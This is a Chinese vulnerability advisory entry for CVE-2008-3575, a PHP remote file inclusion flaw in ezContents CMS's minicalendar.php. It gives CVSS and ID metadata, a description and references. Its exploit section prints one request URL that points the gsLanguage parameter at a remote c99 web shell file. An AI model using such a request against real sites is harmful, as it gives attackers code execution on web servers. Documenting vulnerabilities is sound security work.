EzContents modules/calendar/minicalendar.php 远程代码引用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115756 漏洞类型 代码注入
发布时间 2008-07-25 更新时间 2008-08-10
CVE编号 CVE-2008-3575 CNNVD-ID CNNVD-200808-125
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/32116
https://www.securityfocus.com/bid/84864
https://cxsecurity.com/issue/WLB-2008080131
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-125
|漏洞详情
ezContentsCMS是一套网站管理系统。ezContentsCMS中的modules/calendar/minicalendar.php存在PHP远程文件包含漏洞。远程攻击者可以借助GLOBALS[gsLanguage]参数中的一个URL,可执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/30373/info

ezContents CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.example2.com/soqor10/c99.txt?
|受影响的产品
Ezcontents Ezcontents Cms 0
|参考资料

来源:XF
名称:ezcontents-minicalendar-file-include(44480)
链接:http://xforce.iss.net/xforce/xfdb/44480
来源:BUGTRAQ
名称:20080725ezContentsCMSRenoteFileinclusion
链接:http://www.securityfocus.com/archive/1/archive/1/494755/100/0/threaded
来源:SREASON
名称:4130
链接:http://securityreason.com/securityalert/4130